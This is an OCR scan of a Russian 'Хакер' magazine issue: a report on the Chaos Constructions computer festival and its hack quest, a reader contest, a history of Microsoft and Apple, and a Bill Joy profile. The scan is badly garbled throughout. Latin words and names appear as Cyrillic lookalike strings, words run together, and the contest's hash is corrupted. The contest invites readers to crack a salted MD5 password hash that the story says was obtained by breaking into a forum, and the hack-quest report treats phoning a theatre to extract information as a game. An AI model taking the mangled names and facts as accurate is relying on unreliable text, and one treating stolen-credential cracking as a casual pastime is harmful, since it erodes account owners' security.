анкету на инфодеск. 

Выйдя на улицу покурить (редакция журнала «Хакер» категорически не одобряет 
вредные привычки работников издания и солидарна с Минздравом), я увидел те- 
левизионщиков из Москвы итоварища Длинного, известного фрикера. По какому 
каналу нас всех показывали, я не в курсе, а Серегу (это который фрикер)ты мог 
видеть на обложке февральского номера. И не говори, нетбы голых теток, так... 
Когда мы вернулись в зал, Ргод уже вовсю вел репортаже выставки. 

^ ВЫСТАВКА АЫТІОІІЕ 



>> 



выводившая изображение на главный проектор. Поэтому ходить толпой по 
выставке не было необходимости — можно было сидеть на своем месте и 
наблюдать за развитием событий посредством проектора. 

На стене висели разного рода системные платы. Меня порадовала древняя 
советская микросхема, где родной кириллицей было подписано, где адрес- 
ная шина, где шина данных и т.д. Возле каждой платы висел листочек А4, 
где можно было прочитать, например, когда и почему умер разъем І5А. Не- 
которыетексты организаторы делали сами, некоторые брали из Википедии. 
ЗЬагр РС-7000 бурно обсуждала пара админов в возрасте за сорок — нос- 
тальгия, видимо. АЗЬагр был действительно интересным — компьютер 
можно аккуратно собрать и взять с собой. Хотя, конечно, о никакой автоном- 
ной работе речи не идет, просто гибрид ноутбука и стационарки. 

Рядом паренье девушкой играли в виртуальный бейсбол. У них в руках было 
по специальному джойстику, имитировавшему биту. Игра реагировала на 
движения руки, и ихточно копировал персонаж. Но отбить мяч удавалось 
далеко не каждому. У редактора ][ это не получилось. 




Анонс 

С 29 ноября по 2 декабря в питерском Манеже пройдет фестиваль СЬаоз 
Сопзгшсйопз НаскАгоипб ‘2007. Никаких демо, только информацион- 
ная безопасность и ее аспекты. Нестандартные решения в области ПО 
и железа. Как заявили организаторы, «Ьаскв самом широком смысле 
этого слова». Помимо конкурсов обещают сделать много семинаров. 



Зато я увлекательно поиграл в приставку «Видеоспорт». Жаль, что в СССР по- 
добным устройствам уделяли не много внимания. Могли бы все Денди и Сеги 
переплюнуть. Отмечу, что каждый мог сесть и поработать за любым из пред- 
ставленных экспонатов. За старушками от НР и 5ип собрались юниксоиды, с 
любопытством изучавшие хелпы НР-ІІХ и иных малопопулярных *піх-систем. 
Длинный заинтересовался Арріе 2. Какоказалось, владелец собрал его 
сам. Взял паяльник, чертежи, документацию в нете и сваял свой второй 
Мак. Если бы на СС оказался Стив Джобс, он наверняка бы обратил внима- 
ние на умельца как на потенциального сотрудника. 

Уникальное собрание калькуляторов Сергея Фролова не оказаться на 
СЬаоз’е не могло. У Сергея самая большая в России (может, и в мире) 
коллекция различных вычислительныхустройств. Я смотрел, как прототип 
ЭВМ высчитываетоперации с дробями, и думал, каклюди жили в эпоху, 
когда не было даже 486-х процессоров. 



Экспонаты, участвовавшие в выставке, были предоставлены посетителями 
фестиваля. Так что у каждого древнего компа на СС был свой хозяин. Этим 
и воспользовались организаторы: Ргод подходил к экспонату и задавал не- 
сколько вопросов владельцу. Точнее, компьютерщики сами рассказывали 
о железе давно минувших дней. Все это снимала камера, в режиме онлайн 



Н ДЕЛО БЫЛО ВЕЧЕРОМ 

Вечер первого дня стал отдушиной для аниматоров. Спектрумисты уст- 
роили второй конкурс графики подряд. После показа небольшого фильма 
о графических конкурсах начался Напсісігаѵѵп. На нем демонстрирова- 
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лись рисунки, созданные на компе вручную на планшете, хотя отдельные 
умельцы управлялись мышкой. Сканированные копии, само собой, не 
допускались. Также отсеивались картинки с изображением порно и эротики 
— как объяснили организаторы, такие всегда выигрывают независимо от 
качества работы. 

Час на СС был выделен анимешным фильмам. Выиграл некий Константин 
Лозар строгательной картиной о воздушном пространстве или о чем-то 
другом, смысл чего до меня не дошел. 

Кто-то создал группу «Хаоса» на 1_азіТт . и можно было наблюдать за музы- 
кальными предпочтениями участников: от рокеров «ДДТ» до диджея Ромео. 
Особенно актуально это стало в свете конкурса Мивіс. Темы гпрЗ и им подоб- 
ные (под РС) были не очень интересными, зато трекерная музыка спектру- 
мистов привела зал в восторг. Одна из девушек в первом ряду возмущалась: 
«И чего тут, блин, прикольного? Одну тему от другой не отличить». 

Дело близилось к ночи, и я отправился есть. СС’шный буфет предлагал 
питаться пиццей, готовыми салатами и фастфудовыми бизнес-ланчами. 
Питание нездоровое, но и цены умеренные. 

Через проектор начали гонять повторы конкурсов и фильмы, имеющие 
отношение к информационным технологиям. У выхода из зала спали пятеро 
изнуренных посетителей. 

^ НАСКСШЕ5Т 

Самые главные компьютерщики — это хакеры. На СС функционировала специ- 
альная хак-зона, где рулил Агрессор. Правда, для того чтобы поучаствовать в 
конкурсе по информационной безопасности, необязательно было присутство- 
вать в этой зоне — все задания были в интернете. Конкурс по взлому был всего 
один, но он состоял из нескольких этапов. Он назывался НаскОиевС В нем 
приняло участие порядка 1 70 человек, фактический каждый третий на СС. 

На первом этапе участникам нужно было воспользоваться элементарной 
уязвимостью в баѵаБсгірІ: (езсаре-обфускатор). Как потом рассказывал 
Аддгезвог, этот этап проходили в среднем за 5 минут. 

На втором этапе требовалось пройти тестпо Виндам. Базировался он на эк- 
заменах, подобные которым проходят инженеры в МісгозоЙ, только состоял 
всего из семи вопросов. Тест преодолевали кто брутфорсом, кто ручками. 
Третий этап. Уязвимость в коде флеш-программы. Специальная тулза для 
этого валялась на РТРхак-зоны, ноулюдей все равно возникали нешуточ- 
ные трудности. 



Для участия в четвертой части соревнования пришлось выйти на улицу и 
прогуляться вокруг комплекса. На столбах были расклеены плакаты с над- 
писью «ѴѴапІесІ!» и нарисованными на них демонами В5Б и каким-то гиком. 
Участники должны были догадаться, что показывающие большой палец 
персонажи на рисунках — это не просто так. В шрифте ѴѴеЬОіпдз слово СС 
выглядит именно как характерный жест одобрения. 

Самое интересное лично для меня было на пятом этапе. Требовалосьузнать 
код картриджа принтера, который находится в Мариинке. Что значит, «что 
такое Мариинка?»?Ты не балетоман? Естественно, нужно было не переться 
в театр, а узнать это с помощью социальной инженерии. Позвонить надо 
было. Какоказалось.у большинства наших гениев Ассемблера с СИ боль- 
шиетрудности с этим делом... 

Еще были крякмис (с ним вышел конфуз, поскольку крякать стал и уже на 
ШрУ/сгасктез.сІе І итест, но уже не по Виндам, а по никсам. 

Победителем в итоге стал ѴѴЫ13_Іеат — единственный прошедший все 
8 конкурсов. Впечатления отхак-квеста — самый сильный турнир по безо- 
пасности за историю фестиваля. 

^ ЗАКРЫТИЕ СНА05С0Ы5ТІШСТІ0М 

Второй день показался мне более вялым, чем первый. Посетителей было 
меньше, и большинство из них можно было встретить и в первый день. 

Зато показали весьма увлекательный документальный фильм — рекламные 
ролики 70-х и 80-х годов. Реклама Арріе, Соттобоге и прочих монстров 
ИТ-рынка (многие из которых уже не существуют) спустя годы показалась 
забавной и наивной. Из конкурсов самыми лучшими были СотЬіпеб 16 МВ 
и 2Х5рес{шт 640к Вето. Первый примечателен тем, что есть возможность 
сочетать анимацию с кодингом, а большой размер не ограничивает фанта- 
зию автора. Ну а 640-килобайтная демка на 4Х — так это вообще классика 
жанра. 

Пока одни расставляли оценки конкурсантам, другие вывалились на улицу 
— метать жесткие диски на дальность. Изначально вроде как планировали 
метать клавиатуры, но остановились на НЮй — тяжелее, улетают дальше. 
Самым сильным оказался Игорь Мирошник, чуть не прибивший винтом 
стоявших в сторонезевак. Мнетаки неудалось пробиться ближе кучастни- 
кам, чтобы разглядеть, какое железо тер пит издевательства. Предположи- 
тельноантикварные Оиапіит РігеЬаІІ, каксообщил близкий коргкомитету 
источник. 

На улице, кстати, два дня подряд шло развеселое пивное пати. Пенный 
напиток притаскивали ящиками и распивали под пение Интернационала, 
хитов «Гражданской обороны» и «ДДТ». Проходивший мимо дедушка, 
оглядев кучу пустых бутылок, сказал как бы про себя, но чтобы все слышали: 
«Культурные, б****, люди, программисты хреновы». 

Долго сердиться ему не пришлось — чуваки принесли пустые мешки, куда 
стали складывать стеклотару. 

На церемонии закрытия Ргод и Рапбогп вручали памятные дипломы и 
призы. 

Всем было немножечко грустно. Проигравшие хак-квестдва друга из Моск- 
вы грозились: «Мы вернемся через год. И наш камбэкбудет страшен». 

Я собираюсь посмотреть на это следующим летом, а ты? □с 



Для тех, кто в танке 

Проясню, о чем вообще идет речь. СЬаоз Сопзіхисгіопз (СС) — это ком- 
пьютерный фестиваль, неформальный и некоммерческий. Основную 
роль в программе играют конкурсы, почему его также называют 
демо-пати. Демо — уж это-то ты знаешь — представляют собой 
короткие ролики, где графика рисуется не с помощью графических 
редакторов, а посредством программерского кода. Есть также музы- 
кальные конкурсы, анимационные. На СС транслируются фильмы 
о компьютерах, компьютерном искусстве, здесь можно посмотреть 
игровые приставки советского образца. 

Но главное — это, конечно, общение с единомышленниками. Только 
представь, ты и еще человек 500 помешанных на технике людей! 



► 088 
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ЕсІЖеі 



АІІОІОРНИЕ 

С0ЫТЕ5Т 

В ЭТОМ МЕСЯЦ У ТЕБЯ ЕСТЬ ВОЗМОЖНОСТЬ ВЫРУБИТЬ СЕБЕ ОТЛИЧНЫЙ ПРИЗ ОТ 
ЛЕГЕНДАРНОГО ПРОИЗВОДИТЕЛЯ РАЗНООБРАЗНЫХ АУДИОФИЛЬСКИХ УСТРОЙСТВ ЕОІЫЕР. 
ЕСЛИ СПРАВИШЬСЯ С НАШИМ КОНКУРСОМ, ПОЛУЧИШЬ ОДИН ИЗ ШЕСТИ КРУТЫХ ПРИЗОВ. 




Задача состоит в следующем. Тебе нужно помочь нам 



взломать один пароль, который никак не поддается. 
Дело в том, что на крутом хакерском форуме Рагег- 
Нака какой-то чувак взял и тупо кинул РогЬ'а, продав 
ему вместо приватного сплойта для 55Н мусор начала 
века. Не долго думая, РогЬ взломал форум и выяснил 
ГПСІ5-ХЭШ пароля этого кидалы: 



44а7498Ьаб474К82Ь0а7сс*7ЬЬсШа 



Но вот беда: никак не удается расшифровать этот 
пароль! Помоги сделать это и если взломаешь хэш, 

- получишь один из призов. 

Из дополнительных сведений известно, что хэш 

- «соленый» и для аутентификации используется один 
из стандартных методов «засола» паролей. К слову, об 
этих алгоритмах мы писали в июльском номере X. 

Свои предложения присылай на ящик есІІЛегйгеаІ.хакер.ги. 



сцена 



Монстры ря 

МАРИЯ «МІРНІІ_І_> 

ІТ -индустрии 



ХРОНИКИ АРРІ.Е И МІСК050РТ 



Как известно, все познается в сравнении. Я хочу поведать тебе об истории двух гигантов 
ІТ-индустрии: МісгозоіТ и Арріе. Сравнивай на здоровье! 




С ЧЕГО ВСЕ НАЧИНАЛОСЬ 

Великий и ужасный МісгозоО: (сокращение от МІСВОсотриІегЗОРТѵѵаге) 
основан в Альбукерке в 1975 году двумя школьными друзьями: Полом Алле- 
ном (РаиІАІІеп) и, разумеется, Биллом Гейтсом (ВІИ Ѳаѣез). 

Оба вышеупомянутыхтоварища родились в Сиэтле, штат Вашингтон. Там 
же они посещали весьма престижную частную школу Бакевісіе ЗсЬооІ, в 
которой и познакомились. Несмотря на то что Гейтс был на 2 года младше 
Аллена, они легко нашли общий язык, сойдясь на почвелюбви компьюте- 
рам. В школьные годы два юных гения вовсю оттачивали свое программер- 
ское мастерство на терминале А5Р-33. 

Кстати, учился Гейтс из рук вон плохо, и высшие отметки получал лишь по 
математике, которая его действительно интересовала. В какой-то момент 
его поведение настолько обеспокоило учителей и родителей, что он был 
направлен к психиатру. 

До МісгозоТС Аллен и Гейтс успели реализовать ряд разных проектов. Клю- 
чевым проектом можно назвать их идею создания счетчика трафика на базе 
процессора ІпІе18008. Идея, конечно, возникла не на пустом месте. Дело 
втом, что вто время Гейтс подрабатывал, занимаясьанализом данныхо 
трафике на дорогах. Некая компания І_одіс Зітиіаііоп установила на улицах 
приборы для подсчета дорожного трафика. Выглядело все это ужасно 



топорно по сегодняшним меркам — коробочки, от которых через улицу 
тянулся кабель. Когда по кабелю проезжала машина, прибор ее «считал». 
Гейтс обрабатывал эти данные и переносил их с бумажных перфолент на 
перфокарты, чтобы затем уже перенести информацию на другой компьютер. 
Делать все это одному было и скучно, и просто тяжело, и на помощь Гейтсу 
пришли его приятели, в числе которых был и Аллен. Появилась мысль соз- 
дать для этого процесса автоматизированную машину и упростить его. Они 
учредили свою фирму, назвав ееТгаНО-ОаІа. Прошу обратить внимание: 
Гейтсу на тот момент не было и 20 лет, а штаб-квартира фирмы находилась в 
общаге, в комнате Аллена. 

Вто время Гейтс поступал в Гарвард, а Аллен учился вуниверситете Вашин- 
гтона. Они отдал илисьдругот друга, и их бизнес едва подавал признаки 
жизни. 

Спустя время прибор все же был разработан. Выяснилось, что без машины, 
автоматически читающей перфоленту, ничего не выйдет, а такой машины 
попросту нет. Гейтс выложил из своего кармана $3400, и они купили готовый 
аппарат для чтения перфоленты у компании Епѵіго-БаЬз Мобеі. Некоторое 
время предприятие даже приносило какие-то доходы (по разным данным, 
за год Гейтс зарабатывал порядка $10 000 — 20 000]. Однако потом штат Ва- 
шингтон учредил бесплатную систему контроля за трафиком, и к 1 979 году 



► 090 
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первое предприятие Билла Гейтса потерпело окончательное фиаско. 
Многие считают, что Тгаі-О-Оаіа была переименована в МісгобоЙ и по- 
служила для него базой. Это нетак. МісгобоЙ образовалась параллельно с 
этой фирмой, но, бесспорно, опытТгаІ-О-ОаІа очень помог Аллену и Гейтсу 
впоследствии... 

...Компания Арріе, в свою очередь, основана в Калифорнии в 1 976 году. Как 
ни странно, тоже двумя друзьями юности: Стивом Джобсом (5іеѵе ~1 оЬб) и 
Стивом Возняком (5іеѵе ѴѴоіпіак). Джобс, родившийся и проведший детст- 
во в Кремниевой долине, отличался от сверстников еще в школе — педаго- 
ги отмечали за ним крайне нестандартный склад ума. 

Познакомились два Стивена во время курсов и подработки в компании 
Неѵѵіей-Раскагсі, которые посещали в свободное отучебы время. Джобс 
был на 5 лет младше Возняка. Их дружба продолжалась и вовремя недол- 
гой учебы Джобса в колледже в Портленде, штат Орегон, который он бросил 
после первого же семестра. Правда, еще какое-то время он посещал отде- 
льные курсы (каллиграфию, например), и впоследствии это помогло ему в 
работе вообще и при создании МАС 05 в частности. 

В 1974 году Джобс вернулся из Орегона обратно в Калифорнию и устро- 
ился на работу в компанию Аіагі (культовую контору, занимающуюся КИ) с 
единственной целью — накопить денег на поездку в Индию (не иначе как 
в поисках просветления). Заработав денег, Джобс реализовал свою мечту 
— съездил в Индию вместе с друзьями из колледжа. Вернулся он, очевид- 
но, найдя то, что искал, и вновь приступил к работе вАіагі. 

Тогда же Джобс вступил в клуб компьютерщиков-электронщиков, в котором 
уже состоял Возняк. Уже тогда Возняка микросхемы и паяльники занимали 
гораздо больше, чем его младшего друга. В упомянутом клубе занимались 
многим. Кпримеру, Возняк и Джобс были крайнеувлечены созданием со- 
вершенно нелегального фрикерского девайса Ыие Ьох. «Синяя коробочка» 



Интересно 

Если ты не смотрел фильм «Пираты Кремниевой долины» (у нас также 
известный как «Пираты Силиконовой долины») , ты многое потерял. 
Документально-художественная лента снята не совсем легально для 
ТВ по книге «Пожар в долине: Создание персонального компьютера» 
Пауля Фреиберджера и Майкла Суэйна. Фильм повествует о ранней 
истории МісгозоД и Арріе (с 70-х по середину 80-х годов), о создании 
первых ПК и конкуренции между компаниями. Повествование ведется 
от лица Возняка и Баллмера. 

Также интересно, что упомянутая выше долина именно кремниевая. 
Название долины связано с использованием кремния как полупровод- 
ника при производстве микропроцессоров, а силикон применяют в 
несколько иных областях :) . 

Неизвестно, кто первым перепутал слова зііісоп («кремний») и зШсопе 
(«силикон»), но распространенная у нас ошибка «Силиконовая доли- 
на» корни имеет именно в этой путанице. 



должна была позволить бесплатно звонить по межгороду. Отцом этой затеи 
был Джон Дрэйпер, познакомившись с которым во все том же клубе, оба 
Стивена и загорелись его идеей. 

В Аіагі Джобсу по возвращении из Индии поручили оптимизировать плату 
для игры-арканойда Вгеаскоиі, а вернее, сократить количество чипов в 
ее конструкции. Причем чем меньше их стало бы, тем было бы лучше. По 
каким-то своим причинам Джобс привлек кэтой работе Возняка. Получив- 
шаяся в итоге плата изумила не только Джобса, но и компанию Аіагі. Работа 
была настолько тон кая, что ни один конвейер не смогбы ее воспроизвести. 
Возняк сократил количество чипов на 50 штук! После этого эпизода Джобс 
окончательно убедился, что по-настоящему хорошего инженера (какого он 
видел в Возняке) из него не выйдет. Придя к выводу, что это не его стихия, 
он решил податься в маркетинг. 



70-Е ГОДЫ 

Отучившись в Вашингтоне 2 года, Аллен бросил учебу в университете и 
устроился на работу в компанию Нопеуѵѵеіі, которая базируется в Бостоне. 
Таким образом, он опять оказался неподалеку от Гейтса, который продол- 
жал учебу в Гарварде. А 1 января 1 975 года журнал Рориіаг Еіесігопісв 
опубликовал статью о компьютере АІІаіг 8800. Думаю, это название тебе 
уже знакомо, так как встречается оно часто. Ведь АІІаіг 8800 — ни много ни 
мало первый микрокомпьютер. И именно его считают«ответственным»за 
революцию в этой области спустя несколько лет. 

Прочитав эту статью, Гейтс и Аллен настолько вдохновились, что решили 
написать для него интерпретатор языка ВА5ІС (получивший имя АІІаіг 
ВА5ІС). Разработка много времени не заняла, и уже через месяц был 
подписан контракте Місго Іпзігитепіаііоп апб Теіетеігу Зузіетз (МІТ5), 




производителем компьютера, на использование ВА5ІС в числе ПО кАЙаіг 
8800. Ктомуже Аллена нанимаютв МІТ5 на работу. Именно после этого 
Гейтс под влиянием старшего друга тоже бросаетучебу и переезжает в Аль- 
букерке, чтобы работать с Алленом вместе. И тогда же, в ноябре 1 975 года, 
Гейтс окрестил их партнерство Місго-зоЙ. Спустя год из названия пропал 
дефис, и 26 ноября 1 976 года была официально зарегистрирована торговая 
марка МісгобоЙ. Свежеиспеченная фирма ориентировалась на разработку 
ПО. В первый год после создания в МісгобоЙ работали всего три человека и 
компания приносила своим создателям скромные $16 005. 

В том же 1976 году Гейтс сделал то, в чем любой из нас сегодня узнает его 
почерк, — он написал открытое письмо, обращаясь ко всему на тот момент 
немногочисленному компьютерному сообществу. Дело втом, что в этой 
среде МісгобоЙ’б ВА5ІС был весьма популярен и Гейтс обнаружил, что 
произошла утечка — еще невыпущенная официально копия уже свободно 
гуляла среди компьютерщиков. Такой расклад Гейтса совершенно неуст- 
раивал. Он обратился к комьюнити, заявив, что, оказывается, существует 
коммерческий рынок ПО (такое заявление потем временам было весьма 
странным) и софт не должен свободно копироваться и распространяться 
без разрешения издателя. В письме Гейтс ссылался конкретно на МІТ5 и на 
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свои разработки. Стоитли говорить, что его точка зрения никакого восторга 
в компьютерных кругах не вызвала. Тогда было принято делиться знаниями 
и новинками безвозмездно, то есть даром, и в ответ на обращение Гейтса, 
образно выражаясь, лишь «покрутили пальцем у виска». Но время показа- 
ло, что по поводу развития рынка и того, «как все будет», Гейтс был прав. 

В том же году дороги Місгобоіі и МІТ5 разошлись. Місгозоіі стала само- 
стоятельной фирмой и продолжила разрабатывать софт под различные 
системы. По словам самого Гейтса, первые 5 лет в МісгозоЛ все выполняли 
нетолько свою работу, но и делали все, что могли. Отвечали на звонки, 
паковали и отправляли заказы и тому подобное. Гейтслично просматри- 
вал все отправляемые клиентам программы, каждую строчку кода и часто 
правил какие-то фрагменты по своемуусмотрению. 

В 1 978 году компания открыла первое представительство за рубежом, а 
именно вЯпонии. Ав 1980 году ккомпании присоединился Стив Баллмер 
(Біеѵе Ваіітег), которого позднее Гейтс назначит исполнительным дирек- 
тором. Впереди замаячили первые операционные системы от МісгозоЙ, 
005, партнерство с ІВМ и много других серьезных свершений... 




«И тогда же, в ноябре 1975 года, Гейтс окре- 
стил их партнерство Місго-зоіТ. Спустя год 
из названия пропал дефис, и 26 ноября 1976 
года была официально зарегистрирована 
торговая марка МісгозоіТ » 



...Обстоятельства сложилисьтаким образом, что как раз вскоре послетого, 
какДжобс понял свое истинное предназначение, Вознякзакончил созда- 
ние собственного компьютера. Нужно заметить, это была его давняя мечта 
— домашний компьютер. Учитывая, что вто время таковых попросту не 
продавали и запчасти стоили огромных денег, можно понять, почему мечта 
долго оставаласьтолько мечтой. Некоторое время компьютер существо- 
вал лишь на бумаге — в виде вычислений, подробного перечня деталей и 
схем. Но с подключением к делу Джобса, который увидел в персональных 
компьютерах нетолько будущее, но и свободную нишу на рынке, разработка 
сдвинулась с мертвой точки. 

Продав программируемый калькулятор и машину, два Стивена выручили поряд- 
ка $1300 и приступили кделу. Сначала «цех» базировался в спальне Джобса, а 




когда там кончилось свободное место — в гараже. Джобс, глубоко впечатленный 
талантами Возняка, а также окрыленный мыслью о прибыльности ПК, загора- 
ется желанием открыть свою фирму. Он приглашаетзнакомого из Аіагі — Рона 
Вейна (Ропаісі ѴѴаупе), который берется за разработку логотипа и оказывает 
всяческую поддержку. А Возняктем временем уходите работы, из компании НР. 
Таким образом, 1 апреля 1976 года все трое регистрируюткомпаниюАррІе. По 
одной из версий название Арріе было выбрано потому, что оно должно было сто- 
ять в телефон ном справочнике передАіагі. Когда их неказистое с виду детище на 
базе процессора М.0.5. 6502 с 4 Кб памяти заработало, ему дали имя Арріе I. 
Практически сразу Джобсу удал ось найти и первого оптового покупателя 
Арріе I. Им стал местный магазин Вуіе 5Ьор. Магазин заказал молодой 
фирме 50 аналогичных компьютеров, выразив готовность заплатить по 
$500 за каждую машину. Срок исполнения заказа был суров — 30 дней. 
Джобсу пришлось взять в огромный кредит и здорово напрячься, но 
задача была выполнена. Партия была собрана за 29 дней и успешно 
продана. На этом же этапе случилосьто, что называется «Отряд не заметил 
потери бойца». Дело втом, что Рону Вейну вся эта затея показалась крайне 
сомнительной, и он отказался отсвоей доли Арріе в пользу двух Стивенов. 
Свою долю компании он продал всего за $800, не проработавтам и месяца. 
Так как Арріе I полностью оправдал надежды Джобса, началась активная работа 
в этом направлении. Стоит отметить, что уже во время продаж первого Арріе 
для Возняка он стал пройденным этапом. У него в головеуже вызревал Арріе II. 
Тем временем Джобс, отчаявшись получить кредит в банке (вто время бизнес 
по производству компьютеров казался бредовой затеей), поднял старые связи, 
которыми обзавелся при работе в Аіагі, и нашел ни много ни мало инвестора. 

Им стал Армас Клифф Марккула, который мыслил на одной со Стивами волне. 
Армас нетолько устроил для Арріе кредит на $250 000, но и вложил в развитие 
компании $90 000 из собственных сбережений. Благодаря этому с за конченным 
в 1 977 году Арріе II проблем уже не было, он сразу пошел в продажу. 

Вторая модель, на первый взгляд, не сильно отличалась от первой: ана- 
логичный процессор, те же 4 Кб памяти, но это лишь на первый взгляд. На 
самом же деле было добавлено 8 слотов расширения, реализована работа 
с цветом и самое главное — поддержка РАІ_/І\ІТ5С. В результате Арріе II 
можно было подключить клюбому обычномутелевизору. Стоила машинка 
заметно дороже — уже $1300. Но, каки предвидел Джобс, спрос оказался 
велик, цена покупателей не останавливала. Арріе II разбирали, как горя- 
чие пирожки. Это вывело Арріе в категорию крупных игроков рынка. 
Благодаря поддержке Марккулы втом же году компания стала акцио- 
нерным обществом. А к 1 980 году Арріе, спустя всего 3,5 года с момента 
основания, вышла на миллионные обороты, взяв планку $10 миллионов 
долларов в год. 

Практически сразу после выхода Арріе II, когда стало ясно, насколько он 
успешен, процветающая компания начала работу над проектами Арріе III и 
Арріе Ыза. По настоянию Джобса эти компьютеры уже не ориентировались 
на домашний рынок компьютеров, доступных каждому, а являли собой 
серьезных (и дорогих, что немаловажно) монстровтого времени. Время 
покажет, что это было не самое лучшее решение. 

Продолжение следуетцц 
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|МАРИЯ «МІГВІІ.І.» НЕФЕДОВА! 






Музейный экспонат— рабочая станция 511 N 
и ее создатели 



«Может быть, Зоодіе в 
какой-то момент заменит 
МісгозоЛ с интернетом 
в качестве платформы. 

Ну какие сейчас есть 
интересные, новые при- 
ложения для ПК? Никто 
ничего не может ответить 
на этот вопрос» 



«В голе 
ка кая-т 
лота. Э 
тяжело 
интерн 
У меня 
поднос 









Х-РгоШе 



Билл Джой 

52 года. Сооснователь империи 5ип Місгозузіетз. 

Автор текстового редактора ѵі , один из создателей ^ѵа 



Биография и проекты 

Одна из культовых фигур ІТ-индустрии Билл Джой (ѴѴіІІіат ІЧеІвоп _1оу] 
родился 8 ноября 1954 года в Мичигане. В университете Мичигана он 
получил степень бакалавра по электротехнике, а затем, в 1979 году, 
степень магистра в области электротехники и вычислительных наук в 
университете Беркли. И именно Беркли во многом стал переломным 
этапом в жизни Джоя. 

В конце 70-х годов там началась работа над Вегкеіеу ЦІ N IX, он же ВБй 
II N IX (Вегкеіеу Боііѵѵаге ОізІгіЬиІіоп), в число авторов которого вошел 
наш герой. Эта система распространения ПО создавалась как средство 
для обмена опытом между учебными заведениями в виде исходного 
кода. В наши дни на базе ВБй существует целый ряд операционных 
систем, в частности ЫеіВБО, РгееВЗй, ОрепВБО, ОгадопРІуВБО, РС- 
В50, ВевкІорВБО, а также ядро МАО 05. Ріо в далекие 70-е все это было 
еще впереди. 

Для В50 Джой сделал очень и очень многое. Взять хотя бы текстовый 
редактор ѵі и ТС Р/ІР- прото кол. С последним и вовсе вышла интересная 
штука. В начале 80-х легендарное БАРРА (Агентство перспективных 
исследований МО США), давшее некогда отмашку на создание АРРАпеІ, 
из которого родился Іпіегпеі, поручило фирме ВВІЧ интегрировать в 
В50 ТСР/ІР. Ріа долю Джоя выпал сам процесс интеграции уже готовой 
разработки в систему. Ріо он это делать отказался, потому как детище 
ВВІЧ ему совершенно не понравилось. Джой написал свою высоко- 
производительную версию, которая действительно вышла на порядок 
лучше. Руководство ВВІЧ оказалось в трудном положении, с одной сто- 
роны — серьезный правительственный заказ, с другой — студент, чья 
версия ТСР/ІР была намного лучше их собственной. Джоя вызвали в 
ВВЫ на совещание, куда он явился в совершенно неподобающем виде 
(в футболке :)), и спросили, как он это сделал. Ответ Джоя был прост как 
все гениальное: «Это же очень легко. Читаешь протокол и пишешь код». 
За разработку В50 ІЛЧІХ Билл Джой получил немало наград, в том 
числе Огасе Миггау Норрег АѵѵагсІ от Ассоциации вычислительной тех- 
ники (АСМ). 

В феврале 1982 года, в городе Санта-Клара, что расположен в 
Кремниевой долине, была основана компания 5ип Місговувіетв. 
Аббревиатура 31)14 происходит от названия ЗіапІогсІ Ііпіѵегвііу ІЧеІѵѵогк 

— проекта, которым занимались основатели компании, как не трудно 
догадаться, выходцы из Стэнфордского университета. Ими были Винод 
Хосла (ѴіпосІ КЬозІа) и Энди Бехтольшейм (Апбу ВесЫоІзбеіт). 

В то время компьютерщики и не помышляли о собственных персональ- 
ных машинах, больше работая на микрокомпьютерах или по очереди, или 
в режиме разделения времени. 51Л4 же предложила им альтернативу 

— сравнительно дешевые и мощные рабочие станции. Конкуренция в этой 
области рынка была очень серьезная, и молодая компания решила сделать 
ход конем — базировать свои станции только на промышленных компонен- 
тах и на версии ІЛЧІХ, усовершенствованной Биллом Джоем. Так вышло, 
что Джой присоединился к5ШЧ практически в момент зарождения. 

За долгую и весьма успешную историю 51114 Джой успел принять уча- 
стие в целом ряде разработок, имеющих для компьютерного мира 
огромное значение. Историческое решение компании в 1995 году пол- 
ностью опубликовать свою спецификацию І4Р5 (ІЧеІѵѵогк Рііе 5увІет) 



тоже было приятно не без его участия. Джой горячо поддерживал эту 
идею с самого начала. Под лозунгом «Создать рынок — значит владеть 
им!» ІЧР5 от 5ШЧ стал общедоступен, в то время как другие компании 
берегли свои секреты. 

Среди других проектов, в которых Джой принимал участие, — работа 
над процессорами 5РАРС и над Лпі/ЧаѵаЗрасез. Также ему принадле- 
жит заслуга разработки языка Заѵа. Еще в 1991 году вокруг Джоя сфор- 
мировалась инициативная группа, перед которой стояла задача создать 
образ «продукта будущего», способного перевернуть всю компьютерную 
индустрию с ног на голову. Группа пришла к выводу, что это должен 
быть некий портативный девайс, способный взаимодействовать с чем 
угодно. Следующим выводом группы стала мысль, что для такой штуки 
нужен универсальный язык программирования, который и решено было 
создать. Именно так появился язык Заѵа. И даже спустя годы Джой все 
равно очень трепетно относился к своему детищу — когда речь заходи- 
ла о серьезных изменениях в Чаѵа, по словам коллег, с Джоем приходи- 
лось едва ли не драться. 

Карьера Джоя в 51ЛЧ оборвалась довольно резко. Проработав в компа- 
нии 21 год и являясь ее ведущим разработчиком, в 2003 году он покида- 
ет 5ип Місговувіетв. В пресс-релизе говорилось, что он пока не знает, 
чем будет заниматься далее, и собирается над этим поразмыслить. 

Жизнь после 8ІЖ 

После ухода из 51114 Джой подался в финансы. Еще в 1999 году он 
вместе с парой коллег из 5ип Місговувіетв основал венчурную фирму 
НідЬВАР. И, очевидно, эта стезя показалась ему заманчивой. В 2005 году 
он становится официальным партнером крупного венчурного фонда 
Кіеіпег, Регкіпв, Саиііеісі & Вуегв. Там он выступает в роли консультан- 
та, определяя наиболее перспективные отрасли рынка для вложения 
денег. На этом поприще ему, само собой, приходится сталкиваться с 
новинками ІТ-индустрии, пусть и с несколько другой стороны. Как ясно 
из интервью, со времен функционирования инициативной группы, при- 
думавшей «устройство будущего», точка зрения Джоя на развитие этих 
областей не изменилась. Став финансистом, он по-прежнему уверен, 
что будущее за беспроводными портативными девайсами, способными 
выйти в Сеть из любой точки земного шара. А КПК, мобильные телефо- 
ны и всяческие беспроводные гаджеты — первые ласточки новой зари. 

В 2000 году Джой опубликовал в журнале ѴѴігеб Мадаііпе статью под 
названием «Почему мы не нужны будущему», в которой высказал все 
свои опасения по поводу технического прогресса: нанотехнологий, 
генной инженерии, робототехники и прочего. Джой уверен, что все эти 
разработки угрожают человечеству. По его мнению, уже к 2030 году 
машины будут обладать интеллектом, равным нашему, что может при- 
вести к очень печальным последствиям. Вплоть до того, что роботы 
вообще вытеснят наш вид из социальной и интеллектуальной сфер. 
Стоит заметить, что эту тему Джой активно продвигал довольно долгое 
время. Во многих интервью он призывал хотя бы как-то ограничить 
исследования в этих областях, а лучше — прекратить вовсе. Однако 
позже он стал инвестировать компании, занимающиеся именно этими 
разработками. Так что идеи идеями, а бизнес требует вложений в то, что 
приносит доход. И-И 
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Секрет 

домашнего 



